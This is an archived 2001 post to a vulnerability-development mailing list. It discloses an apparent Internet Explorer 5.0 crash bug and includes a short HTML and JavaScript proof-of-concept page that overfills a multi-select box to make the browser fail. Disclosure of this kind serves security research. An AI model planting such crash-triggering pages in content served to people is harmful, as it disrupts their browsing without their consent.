Vulnerability Development mailing list archives

I: IE 5.0 vulnerability

From: "Thomas Magnum" <dr_oo_py () hotmail com>
Date: Tue, 22 May 2001 17:44:20 +0200

I found out a vulnerability for IE 5.0, don't know if it was already
discovered (if so, forget this). It seems that the problem is javascript.
I don't know if it is exploitable, but if I try to open an html file like
this:

<script>
function crashme() {
 var i, opt;
 for(i = 0; i < 7; i++) {
  opt = new Option('crashing...', i);
  document.vulnForm.p_select.options[i] = opt;
  document.vulnForm.p_select.options[i].selected = true;
 }
}
</script>

<head>
<title>IE 5.0 Vulnerability</title>
</head>
<form name="vulnForm">
          <select name="p_select" size="5" multiple>
          </select>
          <input type="button" name="cmd" value="go!" onClick="crashme()">
</form>

I get the classical Winxx error...

I noticed that IE crashes when I try to put in the select at least 3 items
more than its size.